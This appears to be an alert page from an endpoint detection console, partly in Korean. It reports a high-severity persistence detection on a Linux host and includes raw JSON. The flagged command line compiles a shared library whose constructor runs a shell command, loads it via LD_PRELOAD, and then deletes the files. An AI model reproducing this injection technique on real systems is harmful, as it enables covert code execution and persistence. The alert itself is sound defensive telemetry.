Alert Details - DeFender X

Alert Information High

Alert ID: ind:f04562e41eb24f95911339a2dfa4d617:1766236107127442660-30106-3940368
Composite ID: 84393bf974fd44bda943a25a6a7bc27f:ind:f04562e41eb24f95911339a2dfa4d617:1766236107127442660-30106-3940368
설명: The activity appears to be related to an adversary establishing persistence. The host may already be compromised and the activity should be investigated further to find the source.
호스트: inbridge-40
상태: new
생성 시간: 2025-12-20 22:09:29
업데이트 시간: 2025-12-20 23:08:29

MITRE ATT&CK

Tactic: Persistence
Technique: External Remote Services

Command Line

bash -c cat > /tmp/e.c << "E"
#include <stdlib.h>
void __attribute__((constructor)) i() { system("id"); }
E
gcc -shared -fPIC -o /tmp/e.so /tmp/e.c 2>/dev/null
LD_PRELOAD=/tmp/e.so ls 2>/dev/null
rm -f /tmp/e.c /tmp/e.so

Raw JSON Data

{"id":"ind:f04562e41eb24f95911339a2dfa4d617:1766236107127442660-30106-3940368","composite_id":"84393bf974fd44bda943a25a6a7bc27f:ind:f04562e41eb24f95911339a2dfa4d617:1766236107127442660-30106-3940368","agent_id":"f04562e41eb24f95911339a2dfa4d617","cid":"84393bf974fd44bda943a25a6a7bc27f","description":"The activity appears to be related to an adversary establishing persistence. The host may already be compromised and the activity should be investigated further to find the source.","severity":70,"severity_name":"High","confidence":80,"tactic":"Persistence","tactic_id":"TA0003","technique":"External Remote Services","technique_id":"T1133","cmdline":"bash -c cat \u003E /tmp/e.c \u003C\u003C \u0022E\u0022\n#include \u003Cstdlib.h\u003E\nvoid __attribute__((constructor)) i() { system(\u0022id\u0022); }\nE\ngcc -shared -fPIC -o /tmp/e.so /tmp/e.c 2\u003E/dev/null\nLD_PRELOAD=/tmp/e.so ls 2\u003E/dev/null\nrm -f /tmp/e.c /tmp/e.so","filename":"bash","filepath":"/usr/bin/bash","sha256":"bc5945feb8bd26203ebfafea5ce1878bb2e32cb8fb50ab7ae395cfb1e1aaaef1","status":"new","type":"ldt","created_timestamp":"2025-12-20T13:09:29.455325708Z","updated_timestamp":"2025-12-20T14:08:29.23541463Z","device":{"device_id":"f04562e41eb24f95911339a2dfa4d617","cid":"84393bf974fd44bda943a25a6a7bc27f","agent_version":"7.31.18410.0","hostname":"inbridge-40","local_ip":"10.24.11.214","external_ip":"211.198.135.5","mac_address":"00-0c-29-31-3f-de","platform_name":"Linux","os_version":"Ubuntu 24.04"},"aggregate_id":"aggind:f04562e41eb24f95911339a2dfa4d617:12930907065","CreatedAt":"2025-12-20T22:09:29.4553257+09:00","UpdatedAt":"2025-12-20T23:08:29.2354146+09:00"}

Quick Info

Severity High
Score 70
Agent ID f04562e41eb24f95911339a2dfa4d617

Actions

Falcon Console에서 보기 목록으로 돌아가기